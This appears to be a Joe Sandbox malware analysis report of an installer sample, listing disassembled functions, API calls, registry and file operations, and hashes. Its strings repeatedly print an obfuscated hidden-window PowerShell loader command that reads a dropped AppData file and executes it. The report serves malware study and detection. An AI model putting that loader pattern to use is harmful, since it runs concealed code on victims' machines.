                                                                                                  • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                                                                  • Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
                                                                                                  • Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                • String ID: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) $%machinates%\vatter\udkastelses.Bss116$C:\Users\user\AppData\Roaming\supersystem\panelet$Grammofonpladerne$incarnations\Vaporized\hippogriff
                                                                                                • API String ID: 1941528284-3071970010
                                                                                                • Opcode ID: f81b4b0a62f07454d43e24b26e3037c1c7dc23f8998e09d171ce13397913933d
                                                                                                • Instruction ID: 6271ed47795bff7848a1184a65af423285d25a4990901b96ed448ffc086cd7e6
                                                                                                • Opcode Fuzzy Hash: f81b4b0a62f07454d43e24b26e3037c1c7dc23f8998e09d171ce13397913933d
                                                                                                • Instruction Fuzzy Hash: 4E41C371900615BBCF10BFA5DC46EAF3669DF41368B20823BF521B20E1D63C8A419B6D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 610 404fdc-404ff1 611 4050a7-4050ab 610->611 612 404ff7-405009 610->612 613 405014-405020 lstrlenA 612->613 614 40500b-40500f call 405d13 612->614 615 405022-405032 lstrlenA 613->615 616 40503d-405041 613->616 614->613 615->611 618 405034-405038 lstrcatA 615->618 619 405050-405054 616->619 620 405043-40504a SetWindowTextA 616->620 618->616 621 405056-405098 SendMessageA * 3 619->621 622 40509a-40509c 619->622 620->619 621->622 622->611 623 40509e-4050a1 622->623 623->611
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                                                                • lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                                                                • lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
                                                                                                • SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
                                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                                                Strings
                                                                                                • Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ", xrefs: 00404FFC, 0040500E, 00405014, 00405037, 00405043
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                • String ID: Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "
                                                                                                • API String ID: 2531174081-2660478707
                                                                                                • Opcode ID: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
                                                                                                • Instruction ID: 23c8d3588392bc678d7246373841442171ea5a50e124834ae8740ae97285bd87
                                                                                                • Opcode Fuzzy Hash: 56d315ba140f420ded578357030aec08d31bda6d9c178eb4f5598fdd5f2b2a91
                                                                                                • Instruction Fuzzy Hash: FD218C71900508BADB119FA5DD84ADFBFA9EF14354F14807AF504B6290C2799A41CFA8

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 624 401f68-401f74 625 401f7a-401f90 call 4029fd * 2 624->625 626 40202f-402031 624->626 636 401f92-401f9d GetModuleHandleA 625->636 637 401f9f-401fad LoadLibraryExA 625->637 627 40217c-402181 call 401423 626->627 633 402892-4028a1 627->633 636->637 639 401faf-401fbc GetProcAddress 636->639 637->639 640 402028-40202a 637->640 641 401ffb-402000 call 404fdc 639->641 642 401fbe-401fc4 639->642 640->627 647 402005-402008 641->647 644 401fc6-401fd2 call 401423 642->644 645 401fdd-401ff9 642->645 644->647 654 401fd4-401fdb 644->654 645->647 647->633 650 40200e-402016 call 403727 647->650 650->633 655 40201c-402023 FreeLibrary 650->655 654->647 655->633
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F93
                                                                                                  • Part of subcall function 00404FDC: lstrlenA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                                                                  • Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                                                                  • Part of subcall function 00404FDC: lstrcatA.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00402C51,00402C51,Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",00000000,00000000,00000000), ref: 00405038
                                                                                                  • Part of subcall function 00404FDC: SetWindowTextA.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) ",Execute: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "), ref: 0040504A
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                                                                  • Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                                                Strings
                                                                                                • "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) , xrefs: 00401FE7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                • String ID: "Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77)
                                                                                                • API String ID: 2987980305-2036027624
                                                                                                • Opcode ID: 20bc1816f56d20a1b627cb331607c6b265b609b398bff74a3f14d5173b71760e
                                                                                                • Instruction ID: 3f2733cfc3de05a67066b1a81d0209d8d10e728cfd6e940428cc792ad37f86ee
                                                                                                • Opcode Fuzzy Hash: 20bc1816f56d20a1b627cb331607c6b265b609b398bff74a3f14d5173b71760e
                                                                                                • Instruction Fuzzy Hash: 9A21EB72904215BBCF10BFA4CE4DA6E79B0AB44358F60823BF601B62D1D7BD4D41EA5E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 656 40231c-402362 call 402af2 call 4029fd * 2 RegCreateKeyExA 663 402892-4028a1 656->663 664 402368-402370 656->664 666 402380-402383 664->666 667 402372-40237f call 4029fd lstrlenA 664->667 668 402393-402396 666->668 669 402385-402392 call 4029e0 666->669 667->666 674 4023a7-4023bb RegSetValueExA 668->674 675 402398-4023a2 call 402f1f 668->675 669->668 678 4023c0-402496 RegCloseKey 674->678 679 4023bd 674->679 675->674 678->663 679->678
                                                                                                APIs
                                                                                                • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                                                                                • lstrlenA.KERNEL32(%machinates%\vatter\udkastelses.Bss116,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                                                                                • RegSetValueExA.KERNELBASE(?,?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                                                                                • RegCloseKey.KERNELBASE(?,?,?,%machinates%\vatter\udkastelses.Bss116,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                • String ID: %machinates%\vatter\udkastelses.Bss116
                                                                                                • API String ID: 1356686001-330666689
                                                                                                • Opcode ID: 6670bcdd6f7fb3a37c4f81c4b6863055cb9a018f5a6df9660185d00d0f00dabc
                                                                                                • Instruction ID: 1cf33929fc1c1ea186c23a4fc9732b6d29fed694b94c5232bf99ec9a4aeb90bc
                                                                                                • Opcode Fuzzy Hash: 6670bcdd6f7fb3a37c4f81c4b6863055cb9a018f5a6df9660185d00d0f00dabc
                                                                                                • Instruction Fuzzy Hash: 941172B1E00118BFEB10EFA4DE89EAF7678FB50358F10413AF905B61D1D7B85D41A668

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 681 4015b3-4015c6 call 4029fd call 40581a 686 4015c8-4015e3 call 4057ac CreateDirectoryA 681->686 687 40160a-40160d 681->687 695 401600-401608 686->695 696 4015e5-4015f0 GetLastError 686->696 689 401638-402181 call 401423 687->689 690 40160f-40162a call 401423 call 405cf1 SetCurrentDirectoryA 687->690 702 402892-4028a1 689->702 690->702 705 401630-401633 690->705 695->686 695->687 699 4015f2-4015fb GetFileAttributesA 696->699 700 4015fd 696->700 699->695 699->700 700->695 705->702
                                                                                                APIs
                                                                                                  • Part of subcall function 0040581A: CharNextA.USER32(?,?,00421100,?,00405886,00421100,00421100,?,?,76F92EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405828
                                                                                                  • Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 0040582D
                                                                                                  • Part of subcall function 0040581A: CharNextA.USER32(00000000), ref: 00405841
                                                                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\supersystem\panelet,00000000,00000000,000000F0), ref: 00401622
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Roaming\supersystem\panelet, xrefs: 00401617
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                • String ID: C:\Users\user\AppData\Roaming\supersystem\panelet
                                                                                                • API String ID: 3751793516-2983365704
                                                                                                • Opcode ID: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
                                                                                                • Instruction ID: 1974da3e9f268a507fe0b48e67c441281edfefc09bb705423f1444e47e3c3739
                                                                                                • Opcode Fuzzy Hash: 337c7b3c4140c84b030b3cce5cd43aa59531b2b1dc8ea7579ad4e15f4152f9ed
                                                                                                • Instruction Fuzzy Hash: 4D112931908150ABDB113F755D4496F37B4EA62365728873FF891B22D1C23C4D42A62E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 707 4059b1-4059bb 708 4059bc-4059e7 GetTickCount GetTempFileNameA 707->708 709 4059f6-4059f8 708->709 710 4059e9-4059eb 708->710 712 4059f0-4059f3 709->712 710->708 711 4059ed 710->711 711->712
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 004059C5
                                                                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059DF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: "C:\Users\user\Desktop\ulf4JrCRk2.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                • API String ID: 1716503409-233409385
                                                                                                • Opcode ID: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                                                                                • Instruction ID: 4ed204ab2def1aeaad47fe5e86fe5e9a332b18b7b34da24a025185dbc17c0528
                                                                                                • Opcode Fuzzy Hash: 41eb4eacc2b5e04bba23a072be30983b5b4707d802c2e92527758f248babbe87
                                                                                                • Instruction Fuzzy Hash: 60F02732308308BBEB008F16DC04B9B7B9CDF95720F00C03BF904EA281D2B0D8048B98

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 713 402a3d-402a66 RegOpenKeyExA 714 402ad1-402ad5 713->714 715 402a68-402a73 713->715 716 402a8e-402a9e RegEnumKeyA 715->716 717 402aa0-402ab2 RegCloseKey call 40601c 716->717 718 402a75-402a78 716->718 726 402ab4-402ac3 717->726 727 402ad8-402ade 717->727 719 402ac5-402ac8 RegCloseKey 718->719 720 402a7a-402a8c call 402a3d 718->720 722 402ace-402ad0 719->722 720->716 720->717 722->714 726->714 727->722 728 402ae0-402aee RegDeleteKeyA 727->728 728->722 729 402af0 728->729 729->714
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A5E
                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1352777190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1352758284.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352813944.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1352836177.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1355407410.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_ulf4JrCRk2.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1912718029-0
                                                                                                • Opcode ID: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
                                                                                                • Instruction ID: 87201a58af63731299c065c60a73f314b5aa52cedce30dc2bb0b82caebebd8ee
                                                                                                • Opcode Fuzzy Hash: c984344fdf4f474ce3138d385fa253ab73c2912e651deaf7f4d1b8ad40b66a52
                                                                                                • Instruction Fuzzy Hash: 7B114F71A00008FFDF219F90DE48EAA3B7DEB44349B104076FA05B11A0D7B59E55AF69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 731 40303a-403063 GetTickCount 732 4031a4-4031ac call 402bda 731->732 733 403069-403094 call 4031cc SetFilePointer 731->733 738 4031ae-4031b3 732->738 739 403099-4030ab 733->739 740 4030ad 739->740 741 4030af-4030bd call 4031b6 739->741 740->741 744 4030c3-4030cf 741->744 745 403196-403199 741->745 746 4030d5-4030db 744->746 745->738 747 403106-403122 call 40611c 746->747 748 4030dd-4030e3 746->748 754 403124-40312c 747->754 755 40319f 747->755 748->747 749 4030e5-403105 call 402bda 748->749 749->747 757 403160-403166 754->757 758 40312e-403144 WriteFile 754->758 756 4031a1-4031a2 755->756 756->738 757->755 761 403168-40316a 757->761 759 403146-40314a 758->759 760 40319b-40319d 758->760 759->760 762 40314c-403158 759->762 760->756 761->755 763 40316c-40317f 761->763 762->746 764 40315e 762->764 763->739 765 403185-403194 SetFilePointer 763->765 764->763 765->732
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 0040304F
                                                                                                  • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
